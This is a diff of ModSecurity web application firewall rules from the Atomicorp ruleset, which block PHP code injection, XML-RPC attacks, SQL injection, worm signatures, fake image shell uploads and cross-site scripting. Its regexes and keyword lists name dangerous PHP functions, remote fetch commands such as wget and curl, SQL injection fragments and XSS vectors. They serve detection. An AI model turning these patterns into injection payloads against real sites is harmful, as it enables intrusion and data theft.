+SecRule ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/^snippet/|!ARGS:/template/|!ARGS:message|!ARGS:server_validation|!ARGS:pages|!ARGS:content|!ARGS:msg|!ARGS:/content/|!ARGS:description|!ARGS:solution|!ARGS:problem|!ARGS:prefix|!ARGS:SAMLResponse|!ARGS:suffix|!ARGS:resolution|!ARGS:file|!ARGS:/php/|!ARGS:suffix|!ARGS:prefix|!ARGS:summary|!ARGS:footerfile|!ARGS:/template/|!ARGS:/header/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/descr/|!ARGS:message|!ARGS:p_upload_value|REQUEST_URI_RAW|XML:/*  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompres|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*(?:\"|\(|@|\: ?'?)" "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - hex encoded',id:380020,rev:10,logdata:'%{TX.0}',severity:'2'"
+
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_4
+
+#code injection attempt base64encoded impedence match
+#SecRule MODSEC_BUILD "!@ge 020513900" "t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_5"
+#
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:< ?[?%] ?|\[ ?php)"         "phase:2,t:none,t:urlDecodeUni,t:decodeBase64Ext,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_5
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzencode|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|base64_decode|str_rot13|php_uname|file_get_contents|include|require|require_once|parse_ini_file|set|shell_exec|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|include|php_uname|preg_\w+|execute)\s*[\"\(@]" "t:none,t:urlDecodeUni,t:decodeBase64Ext,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - base64 encoded',id:380018,rev:6,logdata:'%{TX.0}',severity:'2'"
+#SecMarker END_PHP_CODE_INJECTION_ATTACKS_5
+
+#################### XML RPC ATTACKS ####################
+##types that do not have RFI at all
+SecRule TX:STATIC "@eq 1" "phase:2,id:'333833',pass,t:none,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" id:333833,phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS
+
+#SecRule REQUEST_HEADERS:Content-Type "^(?:text|application)/xml"         "phase:1,t:none,t:lowercase,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+#SecRule REQBODY_PROCESSOR "!^XML$" "phase:2,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"
+SecRule XML:/* "@pm select grant delete drop do alter replace truncate update create rename describe table database index view union load_file inserttest remarktest convert execute insert varchar table declare char exit uname define fgets move_uploaded_file readfile ftp_put ftp_fget gzd?en?code gzinflate ftp_nb_put bzopen readdir gzread fopen ftp_nb_f(put|get) ftp_get scandir fscanf readgzfile fread proc_open fgetc fgetss ftp_fput ftp_nb_get session_start fwrite gzwrite gzopen gzcompress curl_multi_exec curl_exec eval create_function base64_decode base64_url_decode decode_base64 str_rot13 uname file_get_contents include parse_ini_file shell_exec mysql_query popen ini_ safe_mode phpinfo preg_ system exec passthru serialize file_get_contents '))" "id:333834,rev:2,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334382,t:none,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"
+
+# Rule 340118: Experimental XML-RPC generic attack sigs
+# ',''));
+SecRule XML:/* "(?:',''\)\)\;|< ?param ?> ?< ?name ?>.*\'\)\;)" "phase:2,log,auditlog,deny,log,status:403,t:none,t:lowercase,t:compressWhiteSpace,id:340118,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic XML-RPC attack'"
+
+SecRule XML:/* "(?:(\w+)and(\w+)char\([0-9]+\)|\b(?:execute|convert) ?\(|(?:\;delete.{1,100};(?:insert|declare @|varchar)|(?:and .{1,100} \(select |\b(?:drop|create)(\w+)table|declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |\bcast\b ?\({1,100} as|xecresultset|' ?; ?declare @|; ?set @)"   "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC SQL injection attack'"
+
+# Rule 340121: Specific XML-RPC attacks on xmlrpc.php
+SecRule XML:/* "(?:(?:(?:echo|uname) ?(?:\'|\")|; ?exit ?;)|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|execute) ?(?:\(|\: ?')|; ?(?:wget|ftpget|curl|fetch|lwp-(?:download|request|mirror|rget)|ncftp|ftp) ?(?:h|f)ttps?:/)"  "phase:2,capture,deny,status:403,log,auditlog,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340121,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC attacks on xmlrpc.php',logdata:'%{TX.0}'"
+
+# Rule 340122: XML-RPC SQL injection generic signature
+SecRule XML:/*  "(?:\b(?:select|grant|drop|alter|replace|truncate|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*|,]+[[:space:]](?:from|into|table|database|index|view)|union select |union all select|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\(|update [a-z0-9]+ set|delete from [a-z0-9]+ where)"  "phase:2,deny,status:403,log,auditlog,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340122,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC SQL injection ',logdata:'%{TX.0}',tag:'SQLi'"
+
+
+SecRule XML:/* "(?: ?eval\ ?\(|file_get_contents\ ?\(|\) ?;? exit ?;)" "phase:2,log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390635,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC encoded command injection attack'"
+
+
+SecRule XML:/* "@pm select grant delete drop do alter replace truncate update create rename describe table database index view union load_file inserttest remarktest convert execute insert varchar table declare char exit uname define fgets move_uploaded_file readfile ftp_put ftp_fget gzd?en?code gzinflate ftp_nb_put bzopen readdir gzread fopen ftp_nb_f(put|get) ftp_get scandir fscanf readgzfile fread proc_open fgetc fgetss ftp_fput ftp_nb_get session_start fwrite gzwrite gzopen gzcompress curl_multi_exec curl_exec eval create_function base64_decode base64_url_decode decode_base64 str_rot13 uname file_get_contents include parse_ini_file shell_exec mysql_query popen ini_ safe_mode phpinfo preg_ system exec passthru serialize file_get_contents " "id:333948,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334383,t:none,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS_B64"
+
+SecRule XML:/* "(?: ?eval\ ?\(|file_get_contents\ ?\(|\) ?;? exit ?;)" "phase:2,log,deny,log,status:403,auditlog,t:none,t:compressWhiteSpace,t:lowercase,id:393635,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC base64 encoded command injection attack'"
+
+# Rule 340122: XML-RPC SQL injection generic signature
+SecRule XML:/*  "(?:\b(?:select|grant|delete|drop|do|alter|replace|truncate|update|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*|,]+[[:space:]](?:from|into|table|database|index|view)|union select |union all select|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()"  "phase:2,deny,status:403,log,auditlog,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340123,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC base64 encoded SQL injection ',logdata:'%{TX.0}',tag:'SQLi'"
+
+# Rule 340120: XML-RPC generic attack sigs
+SecRule XML:/* "(?:(?:(?:echo|uname) ?(?:\'|\")|; ?exit ?;)|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|execute) ?(?:\(|\: ?'?)|; ?(?:wget|ftpget|curl|fetch|lwp-(?:download|request|mirror|rget)|ncftp|ftp) ?(?:h|f)ttps?:/)"  "phase:2,deny,status:403,log,auditlog,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340120,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic XML-RPC  attack'"
+
+SecRule XML:/* "(?:(\w+)and(\w+)char\([0-9]+\)|\b(?:execute|convert) ?\(|(?:\;delete.{1,100};(?:insert|declare @|varchar)|(?:and .{1,100} \(select |\b(?:drop|create)\b(\w+)table|declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select | \bcast\b\ ?\(.{1,100} as |xecresultset|' ?; ?declare\b @|; ?set @)" "phase:2,deny,status:403,log,auditlog,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC base64 encoded SQL injection attack',tag:'SQLi'"
+
+SecMarker END_XML_RPC_ATTACKS_B64
+
+SecMarker END_XML_RPC_ATTACKS
+################ WORM SIGS ###########################
+#
+# Rule 340134: wormsign
+SecRule REQUEST_HEADERS "xxxxxx+\: \+\+\+\+\+\+\+\+\+\+\+\+\+" "phase:2,log,auditlog,deny,log,status:403,t:none,t:lowercase,id:340134,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Worm signature'"
+
+#SecRule TX:STATIC "@eq 1" phase:2,id:'333835',pass,t:none,nolog,noauditlog,skipAfter:END_WORM_SIGS
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" id:333835,phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_WORM_SIGS
+
+#SecRule REQUEST_URI|ARGS|XML:/* "@pm thmc _ghc/rst_ "         "id:333836,t:none,t:urlDecodeUni,phase:2,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,id:334384,t:none,pass,nolog,noauditlog,skipAfter:END_WORM_SIGS
+
+# Rule 340135: THMC worm
+#SecRule REQUEST_URI|ARGS|XML:/* "(?:thmc\.\$dbhost\.thmc\.\$dbname\.thmc\.\$dbuser\.thmc\.\$dbpasswd\.thmc|echo _ghc/rst_)" 	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: THMC or PHPBB worm'"
+
+#SecMarker END_WORM_SIGS
+################# IMAGE FILE CHECKS ######################
+
+#SecRule REQUEST_HEADERS:Content-Type "(?:image/gif|image/jpg|image/png|image/bmp)"
+SecRule REQUEST_HEADERS:Content-Type "image/" "phase:2,id:333837,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334385,t:none,pass,nolog,noauditlog,skipAfter:END_IMAGE_CHECKS"
+
+# Rule 340138: Fake image file shell attacvk
+SecRule REQUEST_BODY "(?:(?:chr|system|passthru|serialize|eval|create_function|exec) ?\(|< ?\? php)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340138,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Fake image file shell attack'"
+
+# Rule 340140: bogus graphics file
+SecRule REQUEST_HEADERS:Content-Disposition "\.(?:php|txt|asp|pl|exe|cgi)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340140,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Bogus graphics file'"
+
+SecRule FILES|FILES_NAMES "\.(?:ph(?:p|tml|t)|txt|asp|pl|exe|cgi|php[0-9])$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  upload attack - Attempt to upload a non-graphics file as a graphics file blocked'"
+
+
+SecMarker END_IMAGE_CHECKS
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "=(?:\(alert\)|alert\(|alert\[)" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:347198,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"
+
+SecRule REQUEST_URI "< ?a ?href ?= ?'? ?javascript" "phase:1,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:347197,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"
+
+##############XSS RULES################################
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm self document this top window document cookie" "id:333138,phase:2,t:none,t:removeComments,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333139,t:none,pass,nolog,noauditlog,skipAfter:END_PRE_XSS_ATTACKS"
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "(?:self|document|this|top|window)\s*\)*(?:\[[^\]]+\]|\.\s*document|\.\s*cookie)" "id:333140,rev:11,severity:2,phase:2,deny,status:403,capture,t:none,t:removeComments,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: JavaScript global variable found',logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',log,auditlog"
+
+SecMarker END_PRE_XSS_ATTACKS
+
+SecRule REQUEST_URI "^/\?customize_changeset_uuid=" "id:321113,rev:1,phase:2,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:SKIP_AFTER_RULE_333141" 
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:XOTSSOCookie|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/*|!REQUEST_COOKIES:cf_clearance|!REQUEST_COOKIES:/user/|!ARGS:cart_description|!ARGS:/webtag/|!ARGS:/html/|!ARGS:/template/|!ARGS:/js/|!ARGS:/css/|!ARGS:/javascript/|!ARGS:/content/|!ARGS:/custom/|!ARGS:/shortcode/|!REQUEST_COOKIES:/activecollab/|!ARGS:vgo_ee "(?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]+on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" "id:333141,rev:21,severity:2,phase:2,status:403,deny,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,msg:'Atomicorp.com WAF Rules: Potential XSS Attack detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',ctl:auditLogParts=+E,log,auditlog"
+
+SecMarker SKIP_AFTER_RULE_333141
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|QUERY_STRING|!ARGS:areas|!ARGS:templatecode "@pm userpassword alert objectclass mail qss xss embed script expression html onevent onmouse ontouch uid onselect onsubmit onfocus onabort onblur onchange ondragdrop onkey ?= img src onload onerror import asfunction: background-image: fromcharcode frame input lowsrc mocha onblur onchange onclick onkeydown onkeypress onkeyup resize select unload shell: settimeout addimport @import url window.location < > env about applet activex chrome getparentfolder getspecialfolder href object eval img base" "id:333838,phase:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,pass,nolog,noauditlog,skip:1,multimatch"
+        SecAction "phase:2,id:334386,t:none,pass,nolog,noauditlog,skipAfter:END_XSS_ATTACKS"
+
+
+#Global rule for Qualys' fake XSS tests
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "(?:<|\(|\{)qx?ss" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,t:removeWhitespace,multimatch,id:347099,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"
+
+SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "=\(alert\)\(" "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,t:removeWhitespace,multimatch,id:347199,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"
+
+
+#Global rule for Qualys' fake XSS tests
+#SecRule REQUEST_URI|REQUEST_HEADERS|ARGS "\; ?\( ?function ?\( ?\)" 	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:removeComments,multimatch,id:347098,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerability scanner attempting cross site scripting attempt'"
+
+# Rule 340099: cross site scripting attempt IMG onerror or onload
+SecRule REQUEST_URI|REQUEST_HEADERS "\< ?(?:img ?/? src ?=|body\b|input\b).{1,100}\bon(?:error|load|focus)\b ?=" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace,t:removeComments,id:340099,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt',multimatch"
+SecRule REQUEST_URI|REQUEST_HEADERS "\< ?(?:img ?/? src ?=|body\b|input\b).{1,100}\bon(?:error|load|focus)\b ?=" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:compressWhitespace,t:lowercase,id:341099,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"
+
+# Rule 340102: cross site scripting attempt STYLE + JSCRIPT
+SecRule REQUEST_URI|REQUEST_HEADERS "type ?= ?[\'\"]text\/(?:j|vb|x-vb|ecma|java|x-java)script" "chain,phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340102,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt'"
+SecRule REQUEST_URI "!(/(?:scripts|staff)/index\.php\?(?:action|_m)=)"
+
+# Rule 340106: cross site scripting attempt STYLE + EXPRESSION
+SecRule REQUEST_URI|REQUEST_HEADERS "style ?= ?[\'\"]? ?x:expression ?\(" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340106,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt STYLE + EXPRESSION'"
+
+# Rule 340109: cross site scripting attempt using XML
+SecRule REQUEST_URI|REQUEST_HEADERS "\[ ?cdata ?\[<\]\]> ?script" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340109,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt using XML'"
+
+# Rule 340110: cross site scripting attempt executing hidden Javascript
+SecRule REQUEST_URI|REQUEST_HEADERS "(?:eval[\s]*\([\s]*[^\.]\.innerhtml[\s]*\)|window\.execscript[\s]*\()" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340110,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt executing hidden Javascript'"
+
+# Rule 340112: cross site scripting attempt to execute Javascript code
+SecRule REQUEST_URI|REQUEST_HEADERS "(?:(?:(?:url|src|href|lowsrc)[\s]*=)|(?:url[\s]*[\(]))[\s]*[\'\"]*javascript[\:]" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:340112,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting attempt to execute Javascript code'"
+
+# Rule 340003: XSS insertion into headers
+SecRule REQUEST_HEADERS|REQUEST_URI "(?:<[[:space:]]*(?:script|about|applet|activex|chrome)|\bon(?:abort|blur|change|click|event|submit|dragdrop|focus|keydown|keypress|keyup|mouse(?:down|move|out|over|up))\b ?= ?(\"|\')? ?\w|<( |\+)?img( |\+)?src( |\+)?=)"  "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,chain,id:340003,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: XSS attack in request headers'"
+SecRule REQUEST_URI "!(modules/tinytinymce/tinymce/jscripts/tiny_mce/utils/validate\.js$)"  "chain,t:none,t:lowercase"
+SecRule REQUEST_HEADERS:Referer "!(clientscript/yui/connection/javascript\:false$)" "t:none,t:lowercase"
+
+Secrule REQUEST_URI "(?:^/eprocservice/supplierinboundservice|^/[a-z0-9/]+?\?fl_builder)" "phase:2,id:345358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_XSS_SPECIAL_2"
+
+# Rule 340211: stealth VBscript injection
+SecRule REQUEST_URI|ARGS "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*b[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:normalisePathWin,t:lowercase,chain,id:340211,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to access shell',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "!(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e)|node\/[0-9]+\/(?:webform\/components\/|edit))|/(?:node/add/|admin/page/edit))" "t:none,t:lowercase"
+
+#Rule 341211
+#Jsencoded window eval
+SecRule REQUEST_URI|ARGS "(?:window ?\[ ?\' ?eval|\( ?\|? ?(?:mail|uid|userpassword|objectclass) ?= ?\* ?\))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,id:341211,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: potentially untrusted encoded javascript detected',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI|ARGS "ontouch(?:move|end|start)=" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multimatch,id:341217,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: potentially untrusted encoded javascript detected',logdata:'%{TX.0}'"
+
+# Rule 340210: cross site scripting stealth attempt to access shell
+SecRule REQUEST_URI|ARGS "(?i:(((url|src|href|lowsrc)[\s]*=)|(url[\s]*[\(]))[\s]*['\x22]*[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*h[\x09\x0a\x0b\x0c\x0d]*e[\x09\x0a\x0b\x0c\x0d]*l[\x09\x0a\x0b\x0c\x0d]*l[\x09\x0a\x0b\x0c\x0d]*[\:])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,t:lowercase,chain,id:340210,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: cross site scripting stealth attempt to access shell',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "!(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e))|/(?:node/add/|admin/page/edit)|node\/[0-9]+\/(?:webform\/components\/|edit|add))" "t:none,t:lowercase"
+
+SecMarker END_XSS_SPECIAL_2
+
+SecRule SERVER_PORT "^844[3-5]$" "id:333839,phase:2,t:none,pass,nolog,noauditlog,skipAfter:END_PLESK1"
+
+SecRule REQUEST_URI "(?:\/(?:index\.php\?(?:(?:module=blocks&type=admin&func=updat|eid=tx_cms_showpic&fil)e))|/(?:node/add/|admin/page/edit)|\?tab=admin|/admin_2s/|^/ndxz-?studio/|node\/[0-9]+\/(?:webform\/components\/|edit|add)|/mail/composemessage|/filemanager/filemanager\.php|/html/scripts/index\.php\?ukey|^/upload/js|^/admin\.php\?templates|/typo3conf/ext/t3quixplorer/|^/eprocservice/supplierinboundservice|^/services/ajax\.php/imp/sendmessage|^/sogo/|^/smb/file-manager/code-editor)|^/\?et_pb_preview=" "id:357839,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_PLESK1"
+
+# Rule 340113 341211: cross site scripting stealth attempt to execute Javascript code
